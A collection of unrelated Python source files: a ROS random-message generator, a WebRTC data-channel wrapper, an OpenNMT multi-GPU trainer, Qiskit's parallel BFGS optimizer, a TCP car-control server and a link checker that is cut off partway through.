dest="TOPICS_PER_TYPE", metavar="NUM", default=1, type=int,
help="number of topics to emit per message type (default 1)"),
dict(args=["--interval"],
dest="INTERVAL", metavar="SECONDS", default=0.5, type=float,
help="live publish interval (default 0.5)"),
dict(args=["--publish-prefix"],
dest="PUBLISH_PREFIX", metavar="PREFIX", default="generate_msgs",
help='prefix to prepend to topic name (default "generate_msgs")'),
dict(args=["--publish-suffix"],
dest="PUBLISH_SUFFIX", metavar="SUFFIX", default="",
help='suffix to append to topic name'),
dict(args=["--no-latch"],
dest="LATCH", default=True, action="store_false",
help="do not latch published topics"),
dict(args=["--option"], # Replaced with dictionary after parsing
dest="OPTIONS", metavar="KEY=VALUE", nargs="+", default=[], action="append",
help="options for generated message attributes, as\n"
" arraylen=MIN,MAX range / length of primitive arrays\n"
" or NUM (default 50,100)\n"
" nestedlen=MIN,MAX range / length of nested message lists\n"
" or NUM (default 1,2)\n"
" strlen=MIN,MAX range / length of strings (default 10,50)\n"
" or NUM\n"
" strchars=CHARS characters to use in strings\n"
" (default all printables)\n"
" NUMTYPE=MIN,MAX value range / constant of numeric types\n"
" or CONSTANT like int8\n"),
],
}
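# Hypothetical invocation sketch (values are illustrative only), combining the options
# defined above: publish ten random std_msgs messages at one-second intervals, with
# 5..10-character strings and int8 fields confined to 0..1:
#
#   ./generate_msgs.py "std_msgs/*" --max-count 10 --interval 1 \
#       --option strlen=5,10 int8=0,1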
## Name used for node
NAME = "generate_msgs"
class rosapi(object):
"""Generic interface for accessing ROS1 / ROS2 API."""
## rclpy.Node instance
NODE = None
## All built-in numeric types in ROS
ROS_NUMERIC_TYPES = ["byte", "char", "int8", "int16", "int32", "int64", "uint8",
"uint16", "uint32", "uint64", "float32", "float64", "bool"]
## All built-in string types in ROS
ROS_STRING_TYPES = ["string", "wstring"]
## All built-in basic types in ROS
ROS_BUILTIN_TYPES = ROS_NUMERIC_TYPES + ROS_STRING_TYPES
## ROS time/duration types mapped to type names
ROS_TIME_CLASSES = {rospy.Time: "time", rospy.Duration: "duration",
genpy.Time: "time", genpy.Duration: "duration"} if rospy else \
{rclpy.time.Time: "builtin_interfaces/Time",
builtin_interfaces.msg.Time: "builtin_interfaces/Time",
rclpy.duration.Duration: "builtin_interfaces/Duration",
builtin_interfaces.msg.Duration: "builtin_interfaces/Duration"}
## Value ranges for ROS integer types, as {typename: (min, max)}
ROS_INTEGER_RANGES = dict({
"byte": (-2** 7, 2** 7 - 1),
"int8": (-2** 7, 2** 7 - 1),
"int16": (-2**15, 2**15 - 1),
"int32": (-2**31, 2**31 - 1),
"int64": (-2**63, 2**63 - 1),
"char": (0, 2** 8 - 1),
"uint8": (0, 2** 8 - 1),
"uint16": (0, 2**16 - 1),
"uint32": (0, 2**31 - 1),
"uint64": (0, 2**64 - 1),
}, **{
"byte": (0, 2** 8 - 1),
"char": (-2** 7, 2** 7 - 1),
} if rclpy else {}) # ROS2 *reverses* byte and char
## ROS2 Data Distribution Service types to ROS built-ins
DDS_TYPES = {"boolean": "bool",
"float": "float32",
"double": "float64",
"octet": "byte",
"short": "int16",
"unsigned short": "uint16",
"long": "int32",
"unsigned long": "uint32",
"long long": "int64",
"unsigned long long": "uint64"}
@classmethod
def get_message_types(cls):
"""Returns a list of available message types, as ["pksg/Msg", ]."""
cmd = "rosmsg list" if rospy else "ros2 interface list --only-msgs"
output = subprocess.check_output(cmd, shell=True).decode()
return sorted(cls.canonical(l.strip()) for l in output.splitlines()
if re.match(r"\w+/\w+", l.strip()))
@classmethod
def init(cls, launch=False):
"""Initializes ROS, creating and spinning node if specified."""
if rospy and launch:
rospy.init_node(NAME)
if rospy and launch:
spinner = threading.Thread(target=rospy.spin)
if rclpy:
rclpy.init()
if rclpy and launch:
cls.NODE = rclpy.create_node(NAME, enable_rosout=False, start_parameter_services=False)
spinner = threading.Thread(target=rclpy.spin, args=(cls.NODE, ))
if launch:
spinner.daemon = True
spinner.start()
@classmethod
def canonical(cls, typename):
"""
Returns "pkg/Type" for "pkg/msg/Type", standardizes various ROS2 formats.
Converts DDS types like "octet" to "byte", and "sequence<uint8, 100>" to "uint8[100]".
"""
is_array, bound, dimension = False, "", ""
match = re.match("sequence<(.+)>", typename)
if match: # "sequence<uint8, 100>" or "sequence<uint8>"
is_array = True
typename = match.group(1)
match = re.match(r"([^,]+)?,\s?(\d+)", typename)
if match: # sequence<uint8, 10>
typename = match.group(1)
if match.lastindex > 1: dimension = match.group(2)
match = re.match("(w?string)<(.+)>", typename)
if match: # string<5>
typename, bound = match.groups()
if "[" in typename: # "string<=5[<=10]" or "string<=5[10]"
dimension = typename[typename.index("[") + 1:typename.index("]")]
typename, is_array = typename[:typename.index("[")], True
if "<=" in typename: # "string<=5"
typename, bound = typename.split("<=")
if typename.count("/") > 1:
typename = "%s/%s" % tuple((x[0], x[-1]) for x in [typename.split("/")])[0]
suffix = ("<=%s" % bound if bound else "") + ("[%s]" % dimension if is_array else "")
return cls.DDS_TYPES.get(typename, typename) + suffix
@classmethod
def create_publisher(cls, topic, typecls, latch=True, queue_size=10):
"""Returns ROS publisher instance."""
if rospy:
return rospy.Publisher(topic, typecls, latch=latch, queue_size=queue_size)
qos = rclpy.qos.QoSProfile(depth=queue_size)
if latch: qos.durability = rclpy.qos.DurabilityPolicy.TRANSIENT_LOCAL
return cls.NODE.create_publisher(typecls, topic, qos)
@classmethod
def get_message_class(cls, typename):
"""Returns ROS message class."""
if rospy:
return roslib.message.get_message_class(typename)
return rosidl_runtime_py.utilities.get_message(cls.make_full_typename(typename))
@classmethod
def get_message_fields(cls, val):
"""Returns OrderedDict({field name: field type name}) if ROS1 message, else {}."""
if rospy:
names = getattr(val, "__slots__", [])
if isinstance(val, (rospy.Time, rospy.Duration)): # Empty __slots__
names = genpy.TVal.__slots__
return collections.OrderedDict(zip(names, getattr(val, "_slot_types", [])))
fields = {k: cls.canonical(v) for k, v in val.get_fields_and_field_types().items()}
return collections.OrderedDict(fields)
@classmethod
def is_ros_message(cls, val):
"""Returns whether value is a ROS message or special like time/duration."""
if rospy:
return isinstance(val, (genpy.Message, genpy.TVal))
return rosidl_runtime_py.utilities.is_message(val)
@classmethod
def is_ros_time(cls, val):
"""Returns whether value is a ROS time/duration."""
return isinstance(val, tuple(cls.ROS_TIME_CLASSES))
@classmethod
def make_full_typename(cls, typename):
"""Returns "pkg/msg/Type" for "pkg/Type"."""
if "/msg/" in typename or "/" not in typename:
return typename
return "%s/msg/%s" % tuple((x[0], x[-1]) for x in [typename.split("/")])[0]
@classmethod
def message_to_yaml(cls, msg):
"""Returns ROS message as YAML string."""
if rospy:
return str(msg)
return rosidl_runtime_py.message_to_yaml(msg)
@classmethod
def scalar(cls, typename, bound=False):
"""
Returns scalar type from ROS message data type, like "uint8" from "uint8[100]".
Returns type unchanged if already a scalar.
@param bound if True, does not strip string boundaries like "string<=10"
"""
if "[" in typename: typename = typename[:typename.index("[")] # int8[?]
if "<=" in typename and not bound:
typename = typename[:typename.index("<=")] # string<=10
return typename
@classmethod
def shutdown(cls):
rclpy and rclpy.shutdown()
class generator(object):
"""Generates random ROS values and message attributes."""
## Attribute generating options
OPTIONS = {
"arraylen": (50, 100), # Length range for primitive arrays like uint8[]
"nestedlen": ( 1, 2), # Length range for nested message lists like Point[]
"strlen": (10, 50), # Length range for strings
"strchars": string.printable.strip() + " ", # Characters used in string
}
@classmethod
def make_random_value(cls, typename, options=None):
"""
Returns random value for ROS builtin type.
@param options {numtype like "int8": fixvalue or (minval, maxval),
"strlen": fixlen or (minlen, maxlen),
"strchars": str} if not using generator defaults
"""
options = dict(cls.OPTIONS, **options or {})
ranges = dict(rosapi.ROS_INTEGER_RANGES, **options or {})
if rosapi.scalar(typename) in rosapi.ROS_STRING_TYPES: # "string<=10" to "string"
LEN = int(re.sub(r"\D", "", typename)) if re.search(r"\d", typename) else \
options["strlen"]
if isinstance(LEN, (list, tuple)): LEN = random.randint(*LEN[:2])
value = "".join(take_sample(options["strchars"], LEN)) if options["strchars"] else ""
elif typename in ("bool", ):
value = random.choice(ranges.get("bool", [True, False]))
elif typename in ("float32", "float64"):
value = random.random()
if typename in ranges:
a, b = (ranges[typename] * 2)[:2]
value = a if a == b else value * (b - a) # Constant or from range
else:
a, b = (ranges[typename] * 2)[:2]
value = a if a == b else random.randint(a, b) # Constant or from range
if rclpy and typename in ("byte", ): # ROS2 *requires* byte value to be bytes()
value = bytes([value])
return value
@classmethod
def populate(cls, msg, options=None):
"""
Returns ROS message with fields populated with random content.
@param options {"arraylen" or "nestedlen" or "strlen": fixlen or (minlen, maxlen),
numtype like "int8": fixvalue or (minval, maxval),
"strchars": str} if not using generator defaults
"""
options = dict(cls.OPTIONS, **options or {})
for name, typename in rosapi.get_message_fields(msg).items():
scalartype = rosapi.scalar(typename)
if typename in rosapi.ROS_BUILTIN_TYPES \
or "[" not in typename and scalartype in rosapi.ROS_BUILTIN_TYPES:
value = cls.make_random_value(typename, options)
elif scalartype in rosapi.ROS_BUILTIN_TYPES: # List of primitives
LEN = options["arraylen"] if typename.endswith("[]") else \
int(re.sub(r"\D", "", typename[typename.index("["):]))
if isinstance(LEN, (list, tuple)): LEN = random.randint(*LEN[:2])
value = [cls.make_random_value(rosapi.scalar(typename, bound=True), options)
for _ in range(LEN)]
elif typename == scalartype: # Single nested message
value = cls.populate(getattr(msg, name), options)
else: # List of nested messages
LEN = options["nestedlen"] if typename.endswith("[]") else \
int(re.sub(r"\D", "", typename[typename.index("["):]))
if isinstance(LEN, (list, tuple)): LEN = random.randint(*LEN[:2])
msgcls = rosapi.get_message_class(scalartype)
value = [cls.populate(msgcls(), options) for _ in range(LEN)]
if rosapi.is_ros_time(msg):
value = abs(value)
setattr(msg, name, value)
return msg
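# Hypothetical sketch (not part of the original script): exercising the generator
# directly. Assumes a ROS1/ROS2 Python environment, since this module imports the ROS
# client libraries at load time; the option values below are illustrative only.
def _generator_usage_sketch():
    """Return a few random values produced with custom length/range options."""
    opts = {"strlen": 5, "int8": (0, 3)}  # fixed 5-char strings, int8 confined to 0..3
    text = generator.make_random_value("string", opts)
    small = generator.make_random_value("int8", opts)
    flag = generator.make_random_value("bool")
    return text, small, flag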
def make_argparser():
"""Returns a populated ArgumentParser instance."""
kws = dict(description=ARGUMENTS["description"], formatter_class=argparse.RawTextHelpFormatter)
argparser = argparse.ArgumentParser(**kws)
for arg in map(dict, ARGUMENTS["arguments"]):
argparser.add_argument(*arg.pop("args"), **arg)
return argparser
def plural(word, items):
"""Returns "N words" or "1 word"."""
count = len(items) if isinstance(items, (dict, list, set, tuple)) else items
return "%s %s%s" % (count, word, "s" if count != 1 else "")
def take_sample(population, k):
"""Returns a list of k randomly chosen elements from population."""
result, n, k = [], k, min(k, len(population))
result = random.sample(population, k)
while len(result) < n:
result += random.sample(population, min(k, n - len(result)))
return result
def wildcard_to_regex(text, end=True):
"""
Returns plain wildcard like "foo*bar" as re.Pattern("foo.*bar", re.I).
@param end whether pattern should match until end (adds $)
"""
suff = "$" if end else ""
return re.compile(".*".join(map(re.escape, text.split("*"))) + suff, re.I)
def process_args(args):
"""
Converts or combines arguments where necessary, returns args.
@param args arguments object like argparse.Namespace
"""
for k, v in vars(args).items(): # Flatten lists of lists and drop duplicates
if not isinstance(v, list): continue # for k, v
here = set()
setattr(args, k, [x for xx in v for x in (xx if isinstance(xx, list) else [xx])
if not (x in here or here.add(x))])
# Split and parse keyword options
opts = dict(generator.OPTIONS, **dict(x.split("=", 1) for x in args.OPTIONS))
for k, v in list(opts.items()):
if not k.endswith("len") and k not in rosapi.ROS_NUMERIC_TYPES \
or not isinstance(v, str):
continue # for k, v
try:
vv = sorted(json.loads("[%s]" % v))
ctor = float if k.startswith("float") else bool if "bool" == k else int
if k.endswith("int64") and sys.version_info < (3, ): ctor = long # Py2
vv = [ctor(x) for x in vv]
if k in rosapi.ROS_INTEGER_RANGES: # Force into allowed range
a, b = rosapi.ROS_INTEGER_RANGES[k]
vv = [max(a, min(b, x)) for x in vv]
opts[k] = vv[0] if len(vv) < 2 and k.endswith("len") else tuple(vv[:2])
except Exception:
sys.exit("Error parsing option %s=%s." % (k, v))
args.OPTIONS = opts
return args
def run(args):
"""Generates messages until Ctrl-C or end condition reached."""
msgtypes = rosapi.get_message_types()
patterns = [wildcard_to_regex(x) for x in args.TYPES]
nopatterns = [wildcard_to_regex(x) for x in args.SKIP_TYPES]
msgtypes = [x for x in msgtypes if not patterns or any(p.match(x) for p in patterns)]
availables = [x for x in msgtypes if not nopatterns or not any(p.match(x) for p in nopatterns)]
if not availables:
print("No message types %s." %
("match" if args.TYPES or args.SKIP_TYPES else "available"))
sys.exit(1)
def choose_topic(typename):
"""Returns new or existing ROS topic name for message type."""
existing = [n for n, t in topiccounts if t == typename]
if len(existing) < args.TOPICS_PER_TYPE:
prefix = "/" + args.PUBLISH_PREFIX.strip("/")
prefix += "/" if len(prefix) > 1 else ""
suffix = "/topic%s" % (len(existing) + 1) if args.TOPICS_PER_TYPE > 1 else ""
suffix += args.PUBLISH_SUFFIX
return "%s%s%s" % (prefix, typename, suffix)
return random.choice(existing)
def choose_type():
"""Returns a random ROS message type name."""
if availables and (not args.MAX_TOPICS
or len(topiccounts) / (args.TOPICS_PER_TYPE or 1) < args.MAX_TOPICS):
return availables.pop(random.randint(0, len(availables) - 1))
        candidates = [t for (_, t), c in topiccounts.items() if c < args.MAX_PER_TOPIC] \
if args.MAX_PER_TOPIC else list(typecounts)
return random.choice(candidates) if candidates else None
def is_finished():
"""Returns whether generating is complete."""
done = count >= args.COUNT if args.COUNT else False
if not done and args.MAX_PER_TOPIC:
            done = all(x >= args.MAX_PER_TOPIC for x in topiccounts.values())
return done
count = 0 # Total number of messages emitted
pubs = {} # {(topic, typename): ROS publisher instance}
typecounts = collections.Counter() # {typename: messages emitted}
topiccounts = collections.Counter() # {(topic, typename): messages emitted}
print("Message types available: %s." % len(msgtypes))
print("Generating a random message each %s seconds." % args.INTERVAL)
rosapi.init(launch=True)
signal.signal(signal.SIGINT, lambda *_, **__: sys.exit()) # Break ROS1 spin on Ctrl-C
try:
while not is_finished():
typename = choose_type()
if not typename:
break # while
topic = choose_topic(typename)
topickey = (topic, typename)
if topickey not in topiccounts:
print("Adding topic %s." % topic)
try:
cls = rosapi.get_message_class(typename)
msg = generator.populate(cls(), args.OPTIONS)
if topickey not in pubs:
pubs[topickey] = rosapi.create_publisher(topic, cls, latch=args.LATCH)
except Exception as e:
print("Error processing message type %r: %s" % (typename, e))
continue # while
if args.VERBOSE:
print("-- [%s] Message %s in %s" % (count + 1, topiccounts[topickey] + 1, topic))
print(rosapi.message_to_yaml(msg))
pubs[topickey].publish(msg)
count += 1
topiccounts[topickey] += 1
typecounts[typename] += 1
if count and not count % 100:
print("Total count: %s in %s." %
(plural("message", count), plural("topic", topiccounts)))
if args.INTERVAL:
time.sleep(args.INTERVAL)
except (KeyboardInterrupt, SystemExit):
pass
except Exception:
traceback.print_exc()
print("")
print("Emitted %s in %s%s." % (plural("message", count), plural("topic", topiccounts),
(" and %s" % plural("type", typecounts)) if args.TOPICS_PER_TYPE > 1 else ""))
print("")
print("Press Ctrl-C to close publishers and exit.")
try:
while True: time.sleep(10)
except KeyboardInterrupt:
pass
rosapi.shutdown()
sys.exit()
if "__main__" == __name__:
runargs = process_args(make_argparser().parse_args())
run(runargs)
|
datachannel.py
|
from pyrtcdc import ffi, lib
from time import sleep
from threading import Thread
from base64 import b64encode, b64decode
RTCDC_CHANNEL_STATE_CLOSED = 0
RTCDC_CHANNEL_STATE_CONNECTING = 1
RTCDC_CHANNEL_STATE_CONNECTED = 2
RTCDC_DATATYPE_STRING = 0
RTCDC_DATATYPE_BINARY = 1
@ffi.def_extern()
def onopen_cb(channel, userdata):
ffi.from_handle(userdata)._onOpen(channel)
@ffi.def_extern()
def onmessage_cb(channel, datatype, data, length, userdata):
if datatype == RTCDC_DATATYPE_STRING:
message = ffi.cast("char *", data)
message = ffi.string(message)
message = message[:length].decode("UTF-8")
if datatype == RTCDC_DATATYPE_BINARY:
message = ffi.cast("char *", data)
message = ffi.buffer(message, length)[:]
if userdata:
ffi.from_handle(userdata)._onMessage(message)
@ffi.def_extern()
def onclose_cb(channel, userdata):
ffi.from_handle(userdata)._onClose(channel)
@ffi.def_extern()
def onchannel_cb(peer, dc, userdata):
dc.on_message = lib.onmessage_cb
dc.user_data = userdata
ffi.from_handle(userdata)._onChannel(peer, dc)
@ffi.def_extern()
def oncandidate_cb(peer, candidate, userdata):
candidate = ffi.string(candidate)
ffi.from_handle(userdata)._onCandidate(peer, candidate)
@ffi.def_extern()
def onconnect_cb(peer, userdata):
ffi.from_handle(userdata)._onConnect(peer, userdata)
class DataChannel():
def _onOpen(self, channel):
self.dc_open = True
self.onOpen(channel)
def _onMessage(self, message):
self.onMessage(message)
def _onClose(self, channel):
self.dc_open = False
self.onClose(channel)
def _onChannel(self, peer, channel):
self.dc_open = True
self.onChannel(peer, channel)
def _onCandidate(self, peer, candidate):
self.onCandidate(peer, candidate)
def _onConnect(self, peer, userdata):
lib.rtcdc_create_data_channel(peer, self.dcName, self.protocol, lib.onopen_cb, lib.onmessage_cb, lib.onclose_cb, userdata)
self.onConnect(peer)
def onOpen(self, channel):
pass
def onMessage(self, message):
pass
def onClose(self, channel):
pass
def onChannel(self, peer, channel):
pass
def onCandidate(self, peer, candidate):
pass
def onConnect(self, peer):
pass
def __init__(self, dcName="test-dc", stunServer="stun.services.mozilla.com", port=3418, protocol=""):
self._handle = ffi.new_handle(self)
self.dc_open = False
self.dcName = bytes(dcName)
self.protocol = bytes(protocol)
port = int(port)
self.peer = lib.rtcdc_create_peer_connection(lib.onchannel_cb, lib.oncandidate_cb, lib.onconnect_cb, bytes(stunServer), port, self._handle)
Thread(target=lib.rtcdc_loop, args=(self.peer, ),).start()
def generate_offer_sdp(self):
offerSDP = lib.rtcdc_generate_offer_sdp(self.peer)
offerSDP = ffi.string(offerSDP)
return b64encode(offerSDP)
def generate_local_candidate(self):
candidateSDP = lib.rtcdc_generate_local_candidate_sdp(self.peer)
candidateSDP = ffi.string(candidateSDP)
return b64encode(candidateSDP)
def parse_offer_sdp(self, offerSDP):
try:
remoteSDP = b64decode(offerSDP)
        except TypeError:
            print("Invalid base64!")
            return None
parse_offer = lib.rtcdc_parse_offer_sdp(self.peer, remoteSDP)
if parse_offer >= 0:
return self.generate_offer_sdp()
else:
print("Error in parsing offer SDP")
return None
def parse_candidates(self, candidate):
try:
remoteCand = b64decode(candidate)
        except TypeError:
            print("Invalid base64!")
            return False
parse_cand = lib.rtcdc_parse_candidate_sdp(self.peer, remoteCand)
return (parse_cand > 0)
def send_message(self, message):
length_msg = len(message)
if type(message) is str:
datatype = RTCDC_DATATYPE_STRING
message = bytes(message)
elif type(message) is bytes:
datatype = RTCDC_DATATYPE_BINARY
if (self.peer[0].initialized > 0):
if (self.dc_open == True and self.peer[0].channels[0].state > RTCDC_CHANNEL_STATE_CLOSED):
channel = self.peer[0].channels[0]
return (lib.rtcdc_send_message(channel, datatype, message, length_msg) == 0)
else:
return False
else:
return False
def destroy_peer_connection(self, peer):
if (self.peer.initialized > 0 and peer.initialized > 0):
lib.rtcdc_destroy_peer_connection(peer)
return True
return False
def destroy_data_channel(self, channel):
if (self.peer.initialized > 0):
if (self.dc_open == True and channel.state > RTCDC_CHANNEL_STATE_CLOSED):
lib.rtcdc_destroy_data_channel(channel)
return True
return False
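# Hypothetical usage sketch (not part of the original module): subclass DataChannel and
# override the callbacks of interest; the remote offer / candidate arguments are
# base64-encoded SDP strings exchanged out of band (e.g. via a signalling server).
class EchoChannel(DataChannel):
    def onMessage(self, message):
        print("received:", message)
        self.send_message(message)  # echo the payload back over the data channel

def _datachannel_usage_sketch(remote_offer_b64, remote_candidate_b64):
    dc = EchoChannel(dcName="echo-dc")
    answer_b64 = dc.parse_offer_sdp(remote_offer_b64)  # answer the remote peer's offer
    dc.parse_candidates(remote_candidate_b64)          # feed the remote ICE candidate
    return answer_b64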
|
train_multi.py
|
#!/usr/bin/env python
"""
Multi-GPU training
"""
import argparse
import os
import signal
import torch
import onmt.opts as opts
import onmt.utils.distributed
from onmt.utils.logging import logger
from onmt.train_single import main as single_main
def main(opt):
""" Spawns 1 process per GPU """
nb_gpu = len(opt.gpuid)
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
opt.gpu_rank = i
opt.device_id = i
procs.append(mp.Process(target=run, args=(
opt, error_queue, ), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(opt, error_queue):
""" run process """
try:
opt.gpu_rank = onmt.utils.distributed.multi_init(opt)
single_main(opt)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_rank, traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='train.py',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
opts.add_md_help_argument(parser)
opts.model_opts(parser)
opts.train_opts(parser)
opt = parser.parse_args()
main(opt)
|
p_bfgs.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Parallelized Limited-memory BFGS optimizer"""
import logging
import multiprocessing
import platform
import warnings
from typing import Optional
import numpy as np
from qiskit.utils import algorithm_globals
from qiskit.utils.validation import validate_min
from .scipy_optimizer import SciPyOptimizer
logger = logging.getLogger(__name__)
class P_BFGS(SciPyOptimizer): # pylint: disable=invalid-name
"""
Parallelized Limited-memory BFGS optimizer.
P-BFGS is a parallelized version of :class:`L_BFGS_B` with which it shares the same parameters.
P-BFGS can be useful when the target hardware is a quantum simulator running on a classical
machine. This allows the multiple processes to use simulation to potentially reach a minimum
faster. The parallelization may also help the optimizer avoid getting stuck at local optima.
Uses scipy.optimize.fmin_l_bfgs_b.
For further detail, please refer to
https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.fmin_l_bfgs_b.html
"""
_OPTIONS = ["maxfun", "ftol", "iprint"]
# pylint: disable=unused-argument
def __init__(
self,
maxfun: int = 1000,
ftol: float = 10 * np.finfo(float).eps,
factr: Optional[float] = None,
iprint: int = -1,
max_processes: Optional[int] = None,
options: Optional[dict] = None,
max_evals_grouped: int = 1,
**kwargs,
) -> None:
r"""
Args:
maxfun: Maximum number of function evaluations.
ftol: The iteration stops when (f\^k - f\^{k+1})/max{\|f\^k\|,\|f\^{k+1}\|,1} <= ftol.
factr : (DEPRECATED) The iteration stops when (f\^k - f\^{k+1})/max{\|f\^k\|,
\|f\^{k+1}|,1} <= factr * eps, where eps is the machine precision,
which is automatically generated by the code. Typical values for
factr are: 1e12 for low accuracy; 1e7 for moderate accuracy;
10.0 for extremely high accuracy. See Notes for relationship to ftol,
which is exposed (instead of factr) by the scipy.optimize.minimize
interface to L-BFGS-B.
iprint: Controls the frequency of output. iprint < 0 means no output;
iprint = 0 print only one line at the last iteration; 0 < iprint < 99
print also f and \|proj g\| every iprint iterations; iprint = 99 print
details of every iteration except n-vectors; iprint = 100 print also the
changes of active set and final x; iprint > 100 print details of
every iteration including x and g.
max_processes: maximum number of processes allowed, has a min. value of 1 if not None.
options: A dictionary of solver options.
max_evals_grouped: Max number of default gradient evaluations performed simultaneously.
kwargs: additional kwargs for scipy.optimize.minimize.
"""
if max_processes:
validate_min("max_processes", max_processes, 1)
if factr is not None:
warnings.warn(
"P_BFGS.__init__() keyword argument factr is deprecated and replaced with ftol. "
"The relationship between the two is ftol = factr * numpy.finfo(float).eps. "
"See https://docs.scipy.org/doc/scipy/reference/optimize.minimize-lbfgsb.html.",
DeprecationWarning,
stacklevel=2,
)
ftol = factr * np.finfo(float).eps
if options is None:
options = {}
for k, v in list(locals().items()):
if k in self._OPTIONS:
options[k] = v
super().__init__(
method="L-BFGS-B",
options=options,
max_evals_grouped=max_evals_grouped,
**kwargs,
)
self._max_processes = max_processes
def optimize(
self,
num_vars,
objective_function,
gradient_function=None,
variable_bounds=None,
initial_point=None,
):
num_procs = multiprocessing.cpu_count() - 1
num_procs = (
num_procs if self._max_processes is None else min(num_procs, self._max_processes)
)
num_procs = num_procs if num_procs >= 0 else 0
if platform.system() == "Darwin":
# Changed in version 3.8: On macOS, the spawn start method is now the
# default. The fork start method should be considered unsafe as it can
# lead to crashes.
# However P_BFGS doesn't support spawn, so we revert to single process.
major, minor, _ = platform.python_version_tuple()
if major > "3" or (major == "3" and minor >= "8"):
num_procs = 0
logger.warning(
"For MacOS, python >= 3.8, using only current process. "
"Multiple core use not supported."
)
elif platform.system() == "Windows":
num_procs = 0
logger.warning(
"For Windows, using only current process. " "Multiple core use not supported."
)
queue = multiprocessing.Queue()
# bounds for additional initial points in case bounds has any None values
threshold = 2 * np.pi
if variable_bounds is None:
variable_bounds = [(-threshold, threshold)] * num_vars
low = [(l if l is not None else -threshold) for (l, u) in variable_bounds]
high = [(u if u is not None else threshold) for (l, u) in variable_bounds]
def optimize_runner(_queue, _i_pt): # Multi-process sampling
_sol, _opt, _nfev = self._optimize(
num_vars, objective_function, gradient_function, variable_bounds, _i_pt
)
_queue.put((_sol, _opt, _nfev))
# Start off as many other processes running the optimize (can be 0)
processes = []
for _ in range(num_procs):
i_pt = algorithm_globals.random.uniform(low, high) # Another random point in bounds
proc = multiprocessing.Process(target=optimize_runner, args=(queue, i_pt))
processes.append(proc)
proc.start()
# While the one optimize in this process below runs the other processes will
# be running too. This one runs
# with the supplied initial point. The process ones have their own random one
sol, opt, nfev = self._optimize(
num_vars, objective_function, gradient_function, variable_bounds, initial_point
)
for proc in processes:
# For each other process we wait now for it to finish and see if it has
# a better result than above
proc.join()
p_sol, p_opt, p_nfev = queue.get()
if p_opt < opt:
sol, opt = p_sol, p_opt
nfev += p_nfev
return sol, opt, nfev
def _optimize(
self,
num_vars,
objective_function,
gradient_function=None,
variable_bounds=None,
initial_point=None,
):
return super().optimize(
num_vars, objective_function, gradient_function, variable_bounds, initial_point
)
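# Hypothetical usage sketch (not part of the original module): minimize a simple convex
# objective with P_BFGS through the optimize() interface defined above. The objective,
# dimension and starting point below are illustrative assumptions only.
def _p_bfgs_usage_sketch():
    def objective(x):
        return float(np.sum((np.asarray(x) - 1.0) ** 2))  # convex bowl, minimum at x = 1
    optimizer = P_BFGS(maxfun=200, max_processes=2)
    sol, opt, nfev = optimizer.optimize(
        num_vars=3, objective_function=objective, initial_point=np.zeros(3)
    )
    return sol, opt, nfev  # solution, objective value, number of function evaluations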
|
car_control.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import threading
import time
from server import TcpServer
import key_control
def recv_msg(client_socket):
while True:
recv_content = client_socket.recv(1024)
if recv_content:
            # start/stop switch  gear lever  left steering  right steering  accelerator  brake pedal
            #         0              0             1              0              0            0
            print("Starting car control...")
recv_content = recv_content.decode("utf-8")
print("收到的指令是:%s" % recv_content)
key_control.work(recv_content)
else:
            # Engine shut off
break
def send_msg(client_socket):
while True:
        # If the thread count is 2 or fewer, the engine has been shut off; stop sending speed info
threading_num = len(threading.enumerate())
if threading_num <= 2:
break
print("发送速度信息...")
time.sleep(1)
class CarCtrlServer(TcpServer):
"""小车控制服务器"""
def __init__(self, server_address):
super().__init__(server_address)
def service(self, client_socket, client_addr):
print("%s小车控制进程启动..." % str(client_addr))
thread_recv = threading.Thread(target=recv_msg, args=(client_socket,))
thread_send = threading.Thread(target=send_msg, args=(client_socket,))
        # Child thread for receiving messages
thread_recv.start()
        # Child thread for sending messages
thread_send.start()
while True:
threading_num = len(threading.enumerate())
if threading_num <= 1:
print("%s小车控制进程结束" % str(client_addr))
break
# Set the IP address and port for car control
SERVER_ADDR = (HOST, PORT) = "192.168.0.10", 10000
def car_ctrl():
"""小车控制程序"""
car_controller = CarCtrlServer(SERVER_ADDR)
car_controller.run_forever()
if __name__ == "__main__":
car_ctrl()
|
links_test.py
|
# -*- coding: utf-8 -*-
import requests
import threading
class Check(object):
def __init__(self, urls, p):
self.urls = set(urls.split('\n'))
self.p = p
self.dic = dict()
self.headers = {'user-agent': 'Mozilla/5.0 (Windows NT 5.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'}
self.lock = threading.Lock()
    def check_one(self, url):
        try:
            html = requests.get(url, headers=self.headers, timeout=4).text
        except Exception:
            with self.lock:
                self.dic[url] = 'bad url'
        else:
            s = html.find(self.p)
            with self.lock:
                self.dic[url] = 'true' if s > -1 else 'false'
def run(self):
threads = []
